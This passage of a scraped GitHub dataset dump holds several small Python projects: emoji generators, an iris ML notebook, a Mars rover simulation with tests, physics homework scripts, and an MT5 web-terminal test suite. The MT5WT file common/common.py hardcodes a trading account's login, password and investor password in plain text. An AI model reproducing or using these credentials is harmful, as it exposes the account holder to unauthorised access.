_ in range(0, length)]\n return u\"\".join(random_unicodes)\n" }, { "alpha_fraction": 0.6607142686843872, "alphanum_fraction": 0.7202380895614624, "avg_line_length": 32.79999923706055, "blob_id": "f75bb4146cb4477b982463f82ac9dd7b695efc40", "content_id": "d830249e58d165d6d7a315f96fbe95d2d4a64163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 87, "num_lines": 5, "path": "/emoji/dingbats.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_dingbats(length):\n random_unicodes = [chr(random.randrange(0x2702, 0x27B0)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7251461744308472, "avg_line_length": 33.400001525878906, "blob_id": "887641f620d3fcaf07fb16a02d1b8c074c068427", "content_id": "75ece9c578d188dcc6e71bde46c6b48f3e0940fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 88, "num_lines": 5, "path": "/emoji/characters.py", "repo_name": "logs3/random_utf8", "src_encoding": "UTF-8", "text": "import random\n\ndef random_characters(length):\n random_unicodes = [chr(random.randrange(0x24C2, 0x1F251)) for _ in range(0, length)]\n return u\"\".join(random_unicodes)" } ]
6
martinkioko/machine-learning
https://github.com/martinkioko/machine-learning
3733e164f96eae676d84b44644c09c87e9501897
076c2e3749f9aeea024e3e992dc8322379aec253
1761155778bd82b97390b119a64c5a23957e2b24
refs/heads/master
2020-12-15T14:28:46.306599
2020-01-20T15:47:13
2020-01-20T15:47:13
235,135,650
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7121211886405945, "alphanum_fraction": 0.7257575988769531, "avg_line_length": 13.461538314819336, "blob_id": "5be55795ecc3e0cadab35d5c26deb3a0f989f25f", "content_id": "015d11a4f1bcc4ba0b7cb87372b29287a38a59f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 84, "num_lines": 91, "path": "/ml steps.py", "repo_name": "martinkioko/machine-learning", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd \nfrom pandas.plotting import scatter_matrix\nimport matplotlib.pyplot as plt\nfrom sklearn import model_selection\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\n\n\n# In[2]:\n\n\nurl = \"https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv\"\nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\ndataset = pd.read_csv(url, names=names)\n\n\n# In[3]:\n\n\ndataset.describe()\n\n\n# In[4]:\n\n\ndataset.groupby('class').size()\n\n\n# In[5]:\n\n\nurl = \"https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv\"\n\n\n# In[6]:\n\n\ndataset.head()\n\n\n# In[7]:\n\n\ndataset.shape\n\n\n# In[8]:\n\n\ndataset.describe()\n\n\n# In[9]:\n\n\ndataset.info()\n\n\n# In[10]:\n\n\ndataset.groupby('class').size()\n\n\n# In[12]:\n\n\ndataset['class'].value_counts()\n\n\n# In[15]:\n\n\ndataset.plot(kind='box') #, subplots=True, layout=(2,2), sharex=False, sharey=False\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 41, "blob_id": "bf13604f23857050a4438189fbbadaa05fef3064", "content_id": "3255ade79e7d084919de3028b91450f1b38b60a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 41, "num_lines": 1, "path": "/README.md", "repo_name": "martinkioko/machine-learning", "src_encoding": "UTF-8", "text": "# supervised machine-learning predictions\n" } ]
2
alka2/mars-rover
https://github.com/alka2/mars-rover
6863bd0006b71b646118897651f30d025e16da17
763bf03e9fa80b0d0625fa2a1f1d02ab2bcf0ff1
edbe875f0902d99ad3a7379be77f4cbdf61122fc
refs/heads/master
2022-04-13T09:34:29.050182
2020-04-15T04:32:35
2020-04-15T04:32:35
255,803,217
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7335995435714722, "alphanum_fraction": 0.7424415349960327, "avg_line_length": 49.08571243286133, "blob_id": "af76f103639a6d7a699f2449e2efbe808eaad609", "content_id": "d9a75b4c084009e4016755212d9936e542835848", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3506, "license_type": "no_license", "max_line_length": 578, "num_lines": 70, "path": "/README.md", "repo_name": "alka2/mars-rover", "src_encoding": "UTF-8", "text": "## Mars Rover\n\nA squad of robotic rovers are to be landed by NASA on a plateau on Mars.\n\nThis plateau, which is curiously rectangular, must be navigated by the rovers so that their on board cameras can get a complete view of the surrounding terrain to send back to Earth.\n\nA rover's position is represented by a combination of an x and y co-ordinates and a letter representing one of the four cardinal compass points. The plateau is divided up into a grid to simplify navigation. An example position might be 0, 0, N, which means the rover is in the bottom left corner and facing North.\n\nIn order to control a rover, NASA sends a simple string of letters. The possible letters are 'L', 'R' and 'M'. 'L' and 'R' makes the rover spin 90 degrees left or right respectively, without moving from its current spot.\n\n'M' means move forward one grid point, and maintain the same heading.\n\nAssume that the square directly North from (x, y) is (x, y+1).\n\nInput:\n\nConfiguration Input: The first line of input is the upper-right coordinates of the plateau, the lower-left coordinates are assumed to be 0,0.\n\nPer Rover Input:\n\nInput 1: Landing co-ordinates for the named Rover. The position is made up of two integers and a letter separated by spaces, corresponding to the x and y co-ordinates and the rover's orientation.\n\nInput 2: Navigation instructions for the named rover. i.e a string containing ('L', 'R', 'M').\n\n### How to run the app\nTo run the application you need to have **Python3.7+**.\n\n#### Test input from command line:\n```\n$ python mars_rover.py \"Plateau:5 5\nRover1 Landing:1 2 N\nRover1 Instructions:LMLMLMLMM\nRover2 Landing:3 3 E\nRover2 Instructions:MMRMMRMRRM\"\n```\n\n#### Test input from a file:\n```\n$ python mars_rover.py input.txt\n```\n\n#### Expected Output:\n```\nRover1:1 3 N\nRover2:5 1 E\n```\n\n#### Unit Test:\n```\n$ python mars_rover_unittest.py\n```\n### Assumptions:\n\n- ``Rovers`` can land in the same grid as they can have different instructions.\n- One Rover can move at a time and finishes its instructions and then next Rover starts its instructions.\n- Collision is acceptable which means if Rover1 is in 1,3 grid, Rover2 can come to the same grid or pass the grid.\n\n### Other possible scenarios:\n\n- ``Rovers`` cannot land in the same grid.\n- ``Rovers`` can move at the same time.\n- Each ``Rover`` moves once at a time and then the next Rover moves.\n- Apply one instruction at a time for each Rover (then apply one instruction for the next Rover).\n- If a ``Rover`` cannot end at a grid that already have a ``Rover`` in it.\n \n#### Changes that are needed for the above scenarios:\n\n- If collision is **acceptable**, there won't be any changes in the main ``Rover`` class functions however ``apply_instructions`` function needs to be updated in order to apply instruction in the desired format.\n- If collision is **NOT acceptable**, there needs to be a change in ``Rover`` class especially ``move`` function to prevent collision and add check for each move to avoid collision (if we do have simultaneous move, each move needs to be checked to make sure that there is no collision) or in some scenarios a Rover can be blocked completely if there is already another Rover in a grid that the other Rover wants to move (like if ``Rover`` cannot end at the same grid, the last ``move`` needs to be checked). Also there needs to be a change in ``apply_instructions`` like above. \n- If ``Rovers`` cannot land at the same spot, then there needs to be a check in ``set_landing`` method in the ``Rover`` class.\n" }, { "alpha_fraction": 0.5969141721725464, "alphanum_fraction": 0.6239151358604431, "avg_line_length": 41.90345001220703, "blob_id": "48f9f7547948bd23e38b79c93d036f0b3956af73", "content_id": "c80354fd7b35832220430310e4e8b8d38818c09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6222, "license_type": "no_license", "max_line_length": 85, "num_lines": 145, "path": "/mars_rover_unittest.py", "repo_name": "alka2/mars-rover", "src_encoding": "UTF-8", "text": "\nimport unittest\n\nimport mars_rover\n\n\nclass TestPlateau(unittest.TestCase):\n\n def setUp(self):\n self.plateau = mars_rover.Plateau()\n\n def test_invalid_get_coordinates(self):\n self.plateau.set_upper_coordinates('7 7')\n self.assertNotEqual(self.plateau.get_coordinates(), [0, 0, 5, 5])\n\n def test_coordinates_input_not_equal_to_two(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, '5 5 3')\n\n def test_coordinates_less_than_zero(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, '-1 -1')\n\n def test_coordinates_not_integer(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, 'S a')\n\n def test_valid_coordinates(self):\n self.plateau.set_upper_coordinates('6 6')\n self.assertEqual(self.plateau.get_coordinates(), [0, 0, 6, 6])\n\n def test_invalid_coordinates(self):\n self.assertRaises(ValueError, self.plateau.set_upper_coordinates, '-1 -1')\n\n\nclass TestRover(unittest.TestCase):\n\n def setUp(self):\n self.rover = mars_rover.Rover()\n self.rover.set_plateau_coordinates([0, 0, 5, 5])\n\n def test_valid_landing(self):\n self.rover.set_landing('1 2 N')\n self.assertEqual(self.rover.get_landing(), [1, 2, 'N'])\n\n def test_invalid_landing_from_file(self):\n self.assertRaises(ValueError, self.rover.set_landing, '5 5')\n\n def test_landing_input_not_equal_to_three(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 N')\n\n def test_landing_coordinates_not_integer(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 W N')\n\n def test_landing_not_valid_orientation(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 2 Q')\n\n def test_landing_x_coordinates_out_of_plateau(self):\n self.assertRaises(ValueError, self.rover.set_landing, '6 2 N')\n\n def test_landing_y_coordinates_out_of_plateau(self):\n self.assertRaises(ValueError, self.rover.set_landing, '1 6 N')\n\n def test_valid_instruction(self):\n self.rover.set_instructions('LMLMLMLMM')\n self.assertEqual(self.rover.get_instruction(), 'LMLMLMLMM')\n\n def test_invalid_instruction_control(self):\n self.assertRaises(ValueError, self.rover.set_instructions, 'LMLMLMLMQ')\n\n def test_valid_navigation(self):\n self.assertEqual(self.rover._new_orientation('N', 'L'), 'W')\n self.assertEqual(self.rover._new_orientation('N', 'R'), 'E')\n self.assertEqual(self.rover._new_orientation('W', 'L'), 'S')\n self.assertEqual(self.rover._new_orientation('W', 'R'), 'N')\n self.assertEqual(self.rover._new_orientation('S', 'L'), 'E')\n self.assertEqual(self.rover._new_orientation('S', 'R'), 'W')\n self.assertEqual(self.rover._new_orientation('E', 'L'), 'N')\n self.assertEqual(self.rover._new_orientation('E', 'R'), 'S')\n\n def test_invalid_navigation(self):\n self.assertNotEqual(self.rover._new_orientation('N', 'L'), 'N')\n self.assertNotEqual(self.rover._new_orientation('N', 'R'), 'S')\n self.assertNotEqual(self.rover._new_orientation('W', 'L'), 'W')\n self.assertNotEqual(self.rover._new_orientation('W', 'R'), 'E')\n self.assertNotEqual(self.rover._new_orientation('S', 'L'), 'N')\n self.assertNotEqual(self.rover._new_orientation('S', 'R'), 'S')\n self.assertNotEqual(self.rover._new_orientation('E', 'L'), 'W')\n self.assertNotEqual(self.rover._new_orientation('E', 'R'), 'E')\n\n def test_navigation_return_type(self):\n self.assertIsInstance(self.rover._new_orientation('N', 'L'), str)\n\n def test_valid_move(self):\n self.assertEqual(self.rover._move('N', 1, 2), (1, 3))\n self.assertEqual(self.rover._move('N', 1, 5), (1, 5))\n self.assertEqual(self.rover._move('S', 1, 2), (1, 1))\n self.assertEqual(self.rover._move('S', 1, 0), (1, 0))\n self.assertEqual(self.rover._move('E', 1, 2), (2, 2))\n self.assertEqual(self.rover._move('E', 5, 1), (5, 1))\n self.assertEqual(self.rover._move('W', 1, 2), (0, 2))\n self.assertEqual(self.rover._move('W', 0, 2), (0, 2))\n\n def test_invalid_move(self):\n self.assertNotEqual(self.rover._move('N', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('N', 1, 5), (1, 6))\n self.assertNotEqual(self.rover._move('S', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('S', 1, 0), (1, 1))\n self.assertNotEqual(self.rover._move('E', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('E', 5, 1), (4, 1))\n self.assertNotEqual(self.rover._move('W', 1, 2), (1, 2))\n self.assertNotEqual(self.rover._move('W', 0, 2), (1, 2))\n\n def test_apply_instruction(self):\n self.rover.set_landing('1 2 N')\n self.rover.set_instructions('LMLMLMLMM')\n self.assertEqual(self.rover.apply_instructions(), (1, 3, 'N'))\n\n\nclass MarsRover(unittest.TestCase):\n\n def test_valid_result_from_problem(self):\n input_data = ['MMRMMRMRRM', '3 3 E', 'LMLMLMLMM', '1 2 N', '5 5']\n expected_output = ['Rover1:1 3 N', 'Rover2:5 1 E']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n def test_invalid_result(self):\n input_data = ['MMRMMRMRRM', '3 3 E', 'LMLMLMLMM', '1 2 N', '5 5']\n unexpected_output = ['Rover1:1 2 N', 'Rover2:5 0 E']\n self.assertNotEqual(mars_rover.run_mars_rover(input_data), unexpected_output)\n\n def test_valid_case_1(self):\n input_data = ['M', '3 3 E', 'L', '1 2 N', '5 5']\n expected_output = ['Rover1:1 2 W', 'Rover2:4 3 E']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n def test_valid_case_2(self):\n input_data = ['MR', '3 3 E', 'LM', '1 2 N', '5 5']\n expected_output = ['Rover1:0 2 W', 'Rover2:4 3 S']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n def test_valid_case_3(self):\n input_data = ['LR', '3 3 N', 'RL', '1 2 S', '5 5']\n expected_output = ['Rover1:1 2 S', 'Rover2:3 3 N']\n self.assertEqual(mars_rover.run_mars_rover(input_data), expected_output)\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.616111695766449, "alphanum_fraction": 0.6207075715065002, "avg_line_length": 43.011451721191406, "blob_id": "656e075317d1fb589ce9eda148349c8bbbc0a25c", "content_id": "e165f53188bf12ab0546eced1cab12716f21870d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11532, "license_type": "no_license", "max_line_length": 120, "num_lines": 262, "path": "/mars_rover.py", "repo_name": "alka2/mars-rover", "src_encoding": "UTF-8", "text": "\nimport sys\nimport os\n\n\nclass Plateau:\n \"\"\"\n class to set the Plateau object coordinates\n \"\"\"\n def __init__(self):\n \"\"\"\n initialize variables\n \"\"\"\n self.__bottom_left_x = 0\n self.__bottom_left_y = 0\n self.__upper_right_x = None\n self.__upper_right_y = None\n\n def set_upper_coordinates(self, upper_coordinates):\n \"\"\"\n function to set Plateau upper right coordinates\n :param upper_coordinates: Plateau coordinates from input\n \"\"\"\n try:\n upper_coordinates = upper_coordinates.strip().split(' ')\n\n # check to make sure user entered only x and y coordinates\n if len(upper_coordinates) != 2:\n raise ValueError\n self.__upper_right_x = int(upper_coordinates[0])\n self.__upper_right_y = int(upper_coordinates[1])\n\n # check upper right coordinates to make sure we have a proper Plateau\n if self.__upper_right_x < 0 or self.__upper_right_y < 0:\n raise ValueError\n\n except ValueError: # catch exception if user didn't enter integers for coordinates and only two\n raise ValueError('You must enter x and y for Plateau upper-right coordinates e.g. 5 5. Please try again!\\n')\n\n def get_coordinates(self) -> list:\n \"\"\"\n function to return Plateau coordinates to be used in Rover object\n :return: array of Plateau coordinates -> [bottom left x, bottom left y, upper right x, upper right y]\n \"\"\"\n return [self.__bottom_left_x, self.__bottom_left_y, self.__upper_right_x, self.__upper_right_y]\n\n\nclass Rover:\n \"\"\"\n class to set Rover object -> landing, instructions and apply instructions to the Rover on the Plateau\n \"\"\"\n def __init__(self):\n \"\"\"\n initialize variables\n \"\"\"\n self.__orientations = ['N', 'E', 'S', 'W'] # allowed orientation\n self.__controls = ['L', 'R', 'M'] # allowed instructions\n self.__plateau_bottom_left_x = None\n self.__plateau_bottom_left_y = None\n self.__plateau_upper_right_x = None\n self.__plateau_upper_right_y = None\n self.__rover_x = None\n self.__rover_y = None\n self.__rover_orientation = None\n self.__rover_instruction = None\n\n def set_plateau_coordinates(self, coordinates):\n \"\"\"\n function to set Plateau coordinates to Rover object\n :param coordinates: coordinates from Plateau objects\n \"\"\"\n self.__plateau_bottom_left_x = coordinates[0]\n self.__plateau_bottom_left_y = coordinates[1]\n self.__plateau_upper_right_x = coordinates[2]\n self.__plateau_upper_right_y = coordinates[3]\n\n def set_landing(self, landing):\n \"\"\"\n function to set the Rover landing coordinates and its orientation\n :param landing: Rover landing coordinates and orientation from input\n \"\"\"\n try:\n landing = landing.strip().split(' ')\n\n # check to make sure user entered x and y coordinates and also orientation\n if len(landing) != 3:\n raise ValueError\n\n self.__rover_x = int(landing[0])\n self.__rover_y = int(landing[1])\n self.__rover_orientation = landing[2].upper()\n\n # check the orientation to see if it is a allowed orientation\n if self.__rover_orientation not in self.__orientations:\n raise ValueError\n\n # check the Rover landing x coordinates to see if it falls into the Plateau x coordinates\n if not self.__plateau_bottom_left_x <= self.__rover_x <= self.__plateau_upper_right_x:\n raise ValueError\n\n # check the Rover landing y coordinates to see if it falls into the Plateau y coordinates\n if not self.__plateau_bottom_left_y <= self.__rover_y <= self.__plateau_upper_right_y:\n raise ValueError\n except ValueError: # capture exception if user didn't enter right information for landing\n raise ValueError(\n 'You must enter Rover landing coordinates and orientation. coordinates must fall into Plateau ' +\n 'coordinates and orientation can be [\"N\", \"E\", \"S\", \"W\"]. N= North, E=East, S=South, W=West. ' +\n 'e.g. 1 2 N for Plateau (5,5) and North facing. Please try again!\\n'\n )\n\n def get_landing(self) -> list:\n \"\"\"\n function to get the Rover landing information\n :return: array of landing info -> [rover x coordinate, rover y coordinate, rover orientation]\n \"\"\"\n return [self.__rover_x, self.__rover_y, self.__rover_orientation]\n\n def set_instructions(self, instruction):\n \"\"\"\n function to set the instructions that needs to be applied to the Rover\n :param instruction: Rover instruction from input\n \"\"\"\n try:\n self.__rover_instruction = instruction.strip().upper()\n\n # check instructions to make sure they are valid instructions\n for instruction in self.__rover_instruction:\n if instruction not in self.__controls:\n raise ValueError\n except ValueError: # capture exception if user didn't enter right information for the instruction\n raise ValueError(\n 'Navigation instructions can be in [\"L\", \"R\", \"M\"] e.g. LMLMLMLMRRM. ' +\n 'L=Left, R=Right, M=Move. Please try again!\\n'\n )\n\n def get_instruction(self) -> str:\n \"\"\"\n function to return navigation instruction\n :return: navigation instruction string\n \"\"\"\n return self.__rover_instruction\n\n def _new_orientation(self, current_orientation, navigate_to) -> str:\n \"\"\"\n function to find the new orientation after 90 degrees left or right spin\n :param current_orientation: current orientation of the Rover\n :param navigate_to: spin 90 to left or right\n :return: desired orientation of the Rover\n \"\"\"\n # spin 90 degrees to left\n if navigate_to == 'L':\n # used mod to return to end of the orientation array after the pointer reached to head\n return self.__orientations[(self.__orientations.index(current_orientation) - 1) % 4]\n # spin 90 degrees to right\n else:\n # used mod to return to head of the orientation array after the pointer reached to end\n return self.__orientations[(self.__orientations.index(current_orientation) + 1) % 4]\n\n def _move(self, orientation, x, y) -> tuple:\n \"\"\"\n function to move Rover to desired location\n :param orientation: current facing of the Rover\n :param x: current x coordinate of the Rover\n :param y: current y coordinate of the Rover\n :return: new x and y coordinates or no change if hit the Plateau boundaries\n \"\"\"\n # if the Rover is facing North and it didn't hit the Plateau upper right y coordinate\n if orientation == 'N' and y < self.__plateau_upper_right_y:\n return x, y + 1\n # if the Rover is facing South and it didn't hit the Plateau bottom left y coordinate\n elif orientation == 'S' and y > self.__plateau_bottom_left_y:\n return x, y - 1\n # if the Rover is facing East and it didn't hit the Plateau upper right x coordinate\n elif orientation == 'E' and x < self.__plateau_upper_right_x:\n return x + 1, y\n # if the Rover is facing West and Rover didn't hit the Plateau bottom left x coordinate\n elif orientation == 'W' and x > self.__plateau_bottom_left_x:\n return x - 1, y\n return x, y\n\n def apply_instructions(self) -> tuple:\n \"\"\"\n apply instruction to the Rover\n :return: the Rover final x and y and also its orientation -> x coordinate, y coordinate, orientation\n \"\"\"\n for instruction in self.__rover_instruction:\n if instruction == 'M':\n self.__rover_x, self.__rover_y = self._move(self.__rover_orientation, self.__rover_x, self.__rover_y)\n else:\n self.__rover_orientation = self._new_orientation(self.__rover_orientation, instruction)\n return self.__rover_x, self.__rover_y, self.__rover_orientation\n\n\ndef get_input() -> list:\n \"\"\"\n function to get input data either from command line or file\n :return: array of input data\n \"\"\"\n if len(sys.argv) != 2:\n raise ValueError('Missing input data. To run: python mars_rover.py <arg1>. arg1 is a file or input data')\n\n # read the Plateau and Rover data from file if file exists otherwise read the input from command line\n if os.path.isfile(sys.argv[1]):\n with open(sys.argv[1], 'r') as input_file:\n plateau_rover_data = [line.strip().split(':')[1] for line in input_file.readlines() if line.strip()]\n else:\n plateau_rover_data = [line.strip().split(':')[1] for line in sys.argv[1].split('\\n') if line.strip()]\n\n # reverse the plateau_rover_data array to be able to use pop() function\n plateau_rover_data.reverse()\n\n return plateau_rover_data\n\n\ndef run_mars_rover(plateau_rover_data):\n \"\"\"\n function to read rovers' data and apply the instruction\n assumptions:\n - one Rover can move at a time and finishes its instructions and then next Rover starts its instructions.\n - collision is acceptable which means if Rover1 is in 1,3 grid, Rover2 can come to the same grid or pass\n the grid.\n possible scenarios that we can change the above behavior:\n - Rovers can move at the same time.\n - each Rover moves once at a time and then the next Rover moves\n - apply one instruction at a time for a Rover then apply one instruction for the next Rover\n possible changes for above scenarios\n - If collision is acceptable, there won't be any changes in the main Rover class functions however\n ``apply_instructions`` function needs to be updated in order to apply instruction in the desired format.\n - If collision is NOT acceptable, there needs to be a change in Rover class especially ``move`` function\n to prevent collision or in some scenarios a Rover can be blocked completely if there is already another\n Rover in a grid that the other Rover wants to surfs. Also there needs to be a change in\n ``apply_instructions`` like above.\n\n :param plateau_rover_data: input data\n \"\"\"\n\n results = []\n\n # set Plateau coordinates - get the first element from plateau_rover_data which is plateau coordinates\n plateau = Plateau()\n plateau.set_upper_coordinates(plateau_rover_data.pop())\n plateau_coordinates = plateau.get_coordinates()\n\n # for loop to run for each Rover. For each Rover, there is two lines of input hence divide by 2\n for i in range(0, int(len(plateau_rover_data) / 2)):\n rover = Rover()\n rover.set_plateau_coordinates(plateau_coordinates)\n rover.set_landing(plateau_rover_data.pop())\n rover.set_instructions(plateau_rover_data.pop())\n rover_x, rover_y, rover_orientation = rover.apply_instructions()\n results.append(\n 'Rover{i}:{x} {y} {orientation}'.format(i=i + 1, x=rover_x, y=rover_y, orientation=rover_orientation)\n )\n return results\n\n\nif __name__ == '__main__':\n\n try:\n res = run_mars_rover(get_input())\n print(*res, sep=\"\\n\")\n except Exception as e:\n raise\n" } ]
3
angelo6792/PHSX815_Week8
https://github.com/angelo6792/PHSX815_Week8
12296ef37e6c8808b0598d300359d43333ab1d66
e1134316eb9222882c62e5c2a87ab117791851e5
56f9d0cd4e0139bafd13ed44ffe136f0ce7d0e46
refs/heads/main
2023-03-28T23:43:20.415358
2021-03-29T00:12:55
2021-03-29T00:12:55
351,286,866
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7018348574638367, "alphanum_fraction": 0.7201834917068481, "avg_line_length": 16.440000534057617, "blob_id": "10605fdd7ccf900f398e3780526112b61f682e8b", "content_id": "8a97eb72ae4564370b7d2681acb5fd44a5f8fbd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 49, "num_lines": 25, "path": "/HW9python/Minimize.py", "repo_name": "angelo6792/PHSX815_Week8", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n# imports of external packages to use in our code\nimport sys\nimport numpy as np\nimport math\nimport sympy as sp\nfrom sympy import Symbol, integrate, exp, oo\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\n\n#create array for funtion\nxx = np.linspace(-1,1)\n\n#random function\ndef f(x):\n return 8*x**4 - 4*x**2 + 3*x\n\n\nplt.plot(xx,f(xx))\nplt.show()\n\n\n#minimize function\nprint(minimize(f,[-1]))\n" }, { "alpha_fraction": 0.6006144285202026, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 15.692307472229004, "blob_id": "0725faf44984cc156e0ad4adc5a083e22ef6432c", "content_id": "8a716641fc560be96b0af418abf93c0925cb6b7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 651, "license_type": "no_license", "max_line_length": 52, "num_lines": 39, "path": "/python/Rayleigh.py", "repo_name": "angelo6792/PHSX815_Week8", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.stats\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nfrom numpy import random\n\n\n\n# Creating dataset\nx1 = [-10,10]\n\n\nNmeas = 1\nNexp = 1000\n\nmu_experiment = 0\nmu_truearr = []\nmu_bestarr = []\nsigma = 2\n\nfor i in range(-100,100):\n mu_true = i//10\n\n for e in range(0,Nexp):\n mu_best = 0\n\n for m in range(0,Nmeas):\n z = float(random.normal(mu_true, sigma))\n mu_best += z\n\nnp.true_divide(mu_true, Nexp)\nmu_bestarr.append(mu_best)\nmu_truearr.append(mu_true)\n\n\nplt.hist2d(mu_truearr,mu_bestarr, bins = 20)\nplt.hist(x1, bins =20)\n#plt.fill(mu_truearr,mu_bestarr)\nplt.show()\n" } ]
2
berpress/MT5WT
https://github.com/berpress/MT5WT
674e14ee8797a5c0e1560c6c82438d4c15464fb0
10826f974cd5aef14e8771e18ca0314f27a902e3
79fb040ce8977ae233fb09152d9fb00419f82706
refs/heads/master
2023-08-04T11:28:38.949923
2019-12-08T08:50:20
2019-12-08T08:50:20
215,619,070
0
0
Apache-2.0
2019-10-16T18:39:46
2019-12-08T08:50:46
2023-07-25T16:56:18
Python
[ { "alpha_fraction": 0.6268656849861145, "alphanum_fraction": 0.6865671873092651, "avg_line_length": 15, "blob_id": "d29f21518a4eda8a3a9bd55af5694b4ea5c7776d", "content_id": "6e8503624bed4622d61d92e0e09985a2709aa510", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 335, "license_type": "permissive", "max_line_length": 31, "num_lines": 21, "path": "/tox.ini", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = py3\nskipsdist = True\n\n[testenv]\ncommands =\n flake8 ./tests\n flake8 ./fixture\n flake8 ./locators\n flake8 ./common\n\n[pytest]\naddopts = -v\ntestpaths = tests\n\n[flake8]\nmax-line-length = 79\nignore = D203, D101, W503, C901\nexclude = .git,__pycache__,venv\napplication-import-names = api\nimport-order-style = google" }, { "alpha_fraction": 0.8108108043670654, "alphanum_fraction": 0.837837815284729, "avg_line_length": 18, "blob_id": "6252d6e51cacd814f8ea939a212883ed872205ca", "content_id": "0b30336213ecfee4213d411739eb132a23df7619", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "permissive", "max_line_length": 26, "num_lines": 2, "path": "/doc/TEST_CASES.md", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "Тест кейсы\n1. Авторизация в терминале" }, { "alpha_fraction": 0.718120813369751, "alphanum_fraction": 0.7516778707504272, "avg_line_length": 36.25, "blob_id": "374e15d844d6ef07b9c66d7c25953cd8c4380270", "content_id": "2b82d64a4e64330ed4488d8f80468e6e6a1de550", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "permissive", "max_line_length": 80, "num_lines": 8, "path": "/common/common.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from collections import namedtuple\n\nAccount = namedtuple(\"Account\", \"trading_type login password investor_password\")\nSymbol = namedtuple(\"Symbol\", \"symbol_type symbol_name\")\n\n\nNETTING_ACCOUNT = Account(\"netting\", \"22722541\", \"hz8phdia\", \"livjdf2b\")\nNETTING_SYMBOLS = Symbol(\"instant_ex\", \"EURUSD\")\n" }, { "alpha_fraction": 0.6796537041664124, "alphanum_fraction": 0.701298713684082, "avg_line_length": 27.875, "blob_id": "d44fd84ccd4e2865813ed20f5451bfe40c0c50d6", "content_id": "d27ef542c17928d8d2100f6c5c02e9e67a59fde6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 111, "num_lines": 16, "path": "/README.md", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "# MT5 WebTerminal\n[![Build Status](https://travis-ci.org/berpress/MT5WT.svg?branch=master)](https://travis-ci.org/berpress/MT5WT)\n\n## Autotests at selenium and python for WebTerminal МТ5 (https://trade.mql5.com/trade)\n\nHow to use:\n1. Copy project\n```\ngit clone [email protected]:berpress/MT5WT.git\n```\n2. Install poetry \n poetry - https://poetry.eustace.io/\n \n How to use poetry:\n 1. Install packeges - poetry install\n 2. Add package - poetry add <package>\n" }, { "alpha_fraction": 0.6499312520027161, "alphanum_fraction": 0.6533700227737427, "avg_line_length": 30.60869598388672, "blob_id": "299e40a9cb4874de2b65b9b25c30dabeb3b58b86", "content_id": "0e0b4b05754bd1e0b0a345547f5821f95c723ea1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1454, "license_type": "permissive", "max_line_length": 79, 